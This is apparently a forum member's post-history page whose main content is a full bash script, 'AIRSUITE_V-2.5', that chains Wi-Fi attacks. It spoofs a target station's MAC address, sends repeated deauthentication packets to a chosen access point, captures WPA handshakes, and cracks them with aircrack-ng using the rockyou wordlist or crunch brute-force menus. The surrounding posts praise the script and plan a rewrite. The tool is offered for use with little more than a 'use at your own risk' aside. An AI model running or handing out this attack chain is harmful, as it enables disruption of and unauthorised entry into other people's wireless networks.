Jump to content

J4rvis

Members
  • Posts

    3
  • Joined

  • Last visited

Everything posted by J4rvis

  1. I relize this post is super old but network testing never gets old
  2. #!/bin/bash clear echo "" #Configuration: HANDSHAKE='/root/Handshakes/HandShake*.cap' WORDLIST='/usr/share/wordlists/rockyou.txt' MONITOR=wlan0 #End configuration echo "******************************************" echo "*************AIRSUITE_V-2.5***************" echo "******************************************" echo "** **" echo "** Wrtten by @thisguysayswht && J4RVIS **" echo "** J4RVIS updated on 01/25/22 **" echo "** **" echo "** Usage: **" echo "** **" echo "** Starts monitor interface **" echo "** dumps wifi for mac association **" echo "** Spoofs macaddress on nic **" echo "** Runs airodump-ng **" echo "** Creates Handshake directory **" echo "** Dumps specified network traffic **" echo "** Deauthenticates specified AP **" echo "** Captures handshake **" echo "** Restores wireless interfaces **" echo "** Runs aircrack-ng **" echo "** **" echo "******************************************" echo "*****************&&&**********************" echo "" echo "" echo "========Press enter to continue========" read START if [[ $START == "" ]]; then sleep 2 clear fi #Use at your own risk... echo "---------------------------------------------------" echo "-Would you like to start a monitor interface[y/n]?-" echo "---------------------------------------------------" echo "" read MONIF if [[ $MONIF == 'y' ]]; then echo "" sudo systemctl stop NetworkManager sudo systemctl stop wpa_supplicant iwconfig echo "Please select a wireless interface from above" echo "" read WIRELESS [[ $WIRELESS == "" ]] sleep 2 clear echo "Starting interface on $WIRELESS..." sleep 2 /sbin/iwconfig $WIRELESS mode monitor sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi echo "--------------------------------------------------" echo "------We need a station mac for association-------" echo "--------------------------------------------------" echo "-Would you like to dump nettraffic to find[y/n]?--" echo "--------------------------------------------------" echo "" read DUMP if [[ $DUMP == 'y' ]]; then echo "" echo "Dumping network traffic...[Ctrl-C to stop]" echo "----------------------------------------" echo "-Copy a station from the target network-" echo "----------------------------------------" sleep 4 sudo airodump-ng $WIRELESS else echo "" echo "Skipping..." sleep 2 fi echo "----------------------------------------" echo "------Ready to spoof your MAC[y/n]?-----" echo "----------------------------------------" echo "" read MACSPF if [[ $MACSPF == 'y' ]]; then echo "" echo "Shutting down all wireless interfaces..." echo "" sleep 2 /sbin/ifconfig $WIRELESS down /sbin/ifconfig $MONITOR down echo "-Please paste the TARGET stations mac-" echo "" read TARGET [[ $TARGET == "" ]] echo "" echo "" echo "Please enter the network BSSID:" echo "" read BSSID [[ $BSSID == "" ]] echo "" echo "Please enter the network channel:" echo "" read CHNEL [[ $CHNEL == "" ]] sleep 2 clear echo "Changing macaddress to $TARGET..." sleep 2 sudo macchanger -m $TARGET $WIRELESS echo "" sleep 2 echo "" echo "Bringing spoofed interfaces up..." echo "" sleep 4 /sbin/ifconfig $WIRELESS up /sbin/ifconfig $MONITOR up else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------" echo "-Would you like to capture a handshake[y/n]?-" echo "---------------------------------------------" echo "" read HANDC if [[ $HANDC == 'y' ]]; then echo "" echo "Creating directory Capfiles..." echo "" sleep 2 cd ~ sudo mkdir Capfiles echo "" sudo airodump-ng -w Capfiles -c $CHNEL --bssid $BSSID $MONITOR & sleep 6 && xterm -hold -e "while true; do sleep 5; aireplay-ng -0 1 -q 2 --ig -a $BSSID $MONITOR; done" && exec -c clear else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------------" echo "-Would you like to capture another handshake[y/n]?-" echo "---------------------------------------------------" echo "" read AGAIN if [[ $AGAIN == "n" ]]; then break echo "" echo "Skipping..." sleep 2 fi clear echo "-----------------------------------------------------------------------" echo "-Would you like to restore your previous interface configuration[y/n]?-" echo "-----------------------------------------------------------------------" echo "" read RESTORE if [[ $RESTORE == "y" ]]; then echo "" echo "Disabling moniter mode..." sleep 2 sudo ifconfig $WIRELESS down echo "" sleep2 /sbin/iwconfig $WIRELESS mode managed echo "Shutting down main wireless interface..." echo "" sleep 2 echo "Restoring perment MAC..." echo "" sleep 2 sudo macchanger -p $WIRELESS echo "" echo "Bringing main wireless interface back up..." echo "" sleep 2 sudo ifconfig $WIRELESS up echo "Wireless interfaces restored" echo "" sudo systemctl start NetworkManager sudo systemctl start wpa_supplicant sudo systemctl restart NetworkManager.service sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "*****************************************************" echo "*******************Select option*********************" echo "*****************************************************" echo "** **" echo "** 1. View handshakes (Ctrl-C to exit) **" echo "** 2. Use rockyou.txt (4 hours) **" echo "** 3. Bruteforce 8 numeric (1 day 6 hrs) **" echo "** 4. Bruteforce 9 numeric (12 days) **" echo "** 5. Bruteforce 10 numeric (4 months) **" echo "** 6. Bruteforce 8 a-z (7 years) **" echo "** 7. Bruteforce 8 A-Z (7 years) **" echo "** 8. Bruteforce 8 a-z + numeric (91 years) **" echo "** 9. Bruteforce 8 A-Z + numeric (91 years) **" echo "** 10. Bruteforce 8 a-z + A-Z (1719 years) **" echo "** 11. Bruteforce custom (???) **" echo "** **" echo "*****************************************************" echo "**********All calculations done @1000 pmk/s**********" echo "*****************************************************" echo "" read n case $n in 1)(xterm -hold -e aircrack-ng $HANDSHAKE) & ;; 2)clear echo "Decompressing rockyou.txt..." gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null echo "" sleep 2 echo "Starting attack..." sleep 3 aircrack-ng -w $WORDLIST $HANDSHAKE echo "" read -p "Press any key to return to script";; 3)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 numeric" echo "" crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 4)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 9 numeric" echo "" crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 5)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 10 numeric" echo "" crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 6)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 7)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 8)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 9)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z numeric" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 10)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z A-Z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 11)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "What arguments would you like to pass to crunch?" echo "" read CRUNCH [[ $CRUNCH == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; *)clear echo "Invalid option" echo "" read -p "Press any key to return to script";; esac sleep 1 done
  3. I am working on this as we speak...i pesonaly think this is very well written. I will be re-writing this and be renaming it to airsuite-ng next few days I will re-upload when finished with modified header still giving you credit for majority of this script and also adding disclaimer in header. (Clearing airmon out due to bug and changing few things) Thanks for writing this though its awsome
×
×
  • Create New...